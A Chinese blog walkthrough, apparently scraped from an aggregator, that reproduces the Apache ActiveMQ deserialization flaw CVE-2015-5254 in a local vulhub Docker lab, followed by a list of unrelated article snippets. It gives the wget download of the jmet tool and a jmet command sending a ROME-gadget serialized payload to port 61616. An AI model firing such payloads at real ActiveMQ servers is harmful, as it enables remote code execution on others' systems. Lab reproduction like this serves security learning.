ActiveMQ反序列化漏洞(CVE-2015-5254)复现 - 渗透测试中心 - 博客园0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache Ahttps://www.cnblogs.com/backlion/p/9970516.htmlActiveMQ 反序列化漏洞复现(CVE-2015-5254)_浮生一世暖流年的博客-CSDN博客环境搭建使用vulhub搭建环境,docker-compose up -d环境搭建以后,开始监听8161和61616两个端口,其中8161是web管理端的端口,61616是工作端口。复现过程构造(可以使用ysoserial)可执行命令的序列化对象作为一个消息,发送给目标61616端口访问web管理页面,读取消息,触发漏洞生成序列化对象使用jmt生成,在同目录下创建一个external文件夹,不然可能报文件不存在错误。java -jar jmet-0.1.0-all.jarhttps://blog.csdn.net/nuanliunian/article/details/111366688?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1.pc_relevant_aa&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-1.pc_relevant_aa&utm_relevant_index=2Base64编码转换工具,Base64加密解密Base64是一种基于64个可打印ASCII字符对任意字节数据进行编码的算法。在Base64中的可打印字符包括大写字母A-Z、小写字母a-z、数字0-9,加号+和斜杠/。Base64使用4个ASCII字符编码3字节原数据,所以编码后的数据量是原数据的4/3。Base64编码广泛用于只能传输ASCII字符的场合,最常用于文本信息的处理传输,例如电子邮件中,为解决跨语言计算机邮件文本乱码,通常将内容用Base64编码后再发送。https://www.qqxiuzi.cn/bianma/base64.htm

进入vulhub目录

[/home/kali/vulhub/activemq/CVE-2015-5254]

使用命令启动靶场

docker-compose up -d
docker ps -a

查看访问靶场

在控制台依次执行

cd /optwget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jarmkdir external

构造

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "命令" -Yp ROME   127.0.0.1(靶机IP)   61616请参考第二个链接到第三个网站进行base64加密

kali 2连接成功

漏洞原理:

该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

ActiveMQ--CVE-2015-5254相关推荐

  1. linux ssh权限漏洞,OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)

    OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) 发布日期:2016-05-02 更新日期:2016-05-04 受影响系统:OpenSSH OpenSSH &l ...

  2. 删除oracle补丁包,最新Oracle关键补丁:更新包括248个修复

    最新的Oracle 关键补丁更新是迄今为止最大的,包含248个修复,共覆盖24个产品线. Oracle关键补丁更新程序已经持续了11年,每年发布四次补丁.安全补丁覆盖24个不同的产品线,包括但不限于O ...

  3. 103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LINUX 内核漏洞提权 1.漏洞背景: 2.漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME ...

  4. billu_b0x靶场通关

    billu靶场通关 靶机ip:192.168.112.134 信息收集 端口开放 80 目录扫描 images目录存在目录遍历 test.php(任意文件下载) add.php(文件上传) index ...

  5. 工控系统的全球安全现状:全球漏洞实例分析

    工控系统的全球安全现状:全球漏洞实例分析 一.摘要 ​ 运营技术(OT).网络和设备,即工业环境中使用的所有组件,在设计时并未考虑到安全性.效率和易用性是最重要的设计特征,然而,由于工业的数字化,越来 ...

  6. vulhub打靶第一周

    title: vulhub打靶第一周 description: vulhub打靶第一周 难度:middle date: 2023-06-01 categories: [渗透,靶机] 图片链接有问题访问 ...

  7. vulnhub potato

    vulnhub potato(难度:简单) 知识点 一 信息收集 二 从7120端口突破 三 爆破 linux内核提权 知识点 一 nmap的使用 二 SSH爆破 三 漏洞库的利用 四 LINUX内核 ...

  8. 靶机系列-----medium_socnet

    ​声明 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关. 靶机地址: https://www.vulnhub.com/entry/boredhackerblog-soci ...

  9. 阿里巴巴发布《2015移动安全漏洞年报》

    2019独角兽企业重金招聘Python工程师标准>>> 第一章 2015年应用漏洞 1.1 业界公开的应用漏洞类型和分布 2015是不平凡的一年,各界媒体对移动应用的漏洞关注度也越来 ...

  10. activemq和jms_带有ActiveMQ和Maven的JMS Sender应用程序

    activemq和jms 我们已经看到了如何使用ActiveMQ和Maven创建JMS Receiver应用程序 . 让我们看看我们如何类似地创建JMS Sender应用程序 . web.xml与创建 ...

最新文章

  1. Python之os模块用法
  2. 工业机器人发展现状:硬件制造大同小异,视觉感知绘新蓝图
  3. linux下多线程实现服务端
  4. java 线程的基本概念_Java多线程——多线程的基本概念和使用
  5. python提取图片gps坐标_用python从.docx文件中提取GPS坐标
  6. 前端Http协议缓存初解
  7. vue2.x+springboot1.x+nginx服务器部署踩坑日记
  8. 第八次立会顺利召开!
  9. excel冻结标题栏,让标题栏不滚动的方法
  10. jquery 拖动改变div 容器大小
  11. Exchange 2013CU17和office 365混合部署-设置属性筛选(三)
  12. JS学习总结(10)——Windows对象
  13. Python零基础福利来了!
  14. ANYCUBIC Photon Mono 4K光固化打印机快速上手(多次试错的经验积累)
  15. 神仙打架!清华公布2020特奖候选人名单,有人三篇顶会一作,还有人...
  16. 华为认证HCNE考试知识点
  17. Gitlab在线安装、离线安装、搭建、使用等详细介绍,不能再详细了……
  18. Ubuntu新旧版本下载地址
  19. oracle 修改jobs执行时间,oracle JOB常见的执行时间
  20. 力扣(LeetCode)剑指offer刷题笔记(java),已完结!!!

热门文章

  1. java html截图_Java实现网页截图/登录截图
  2. 图解HTTP读书笔记
  3. 数据结构PTA 案例6-1.3 哥尼斯堡的“七桥问题”
  4. 雷达原理-运动目标检测与测速
  5. 海贼王里面路飞的一些台词翻译
  6. Could not create the Java Virtual Machine
  7. UMTS到LTE的系统架构演进(学习整理:LTE完全指南-LTE、LTE-Advanced、SAE、VolTE和4G移动通信)
  8. 【转载】UMTS和GSM的架构
  9. 平安普惠java面试_【面经】平安普惠开发工程师面试
  10. 随机数公式Random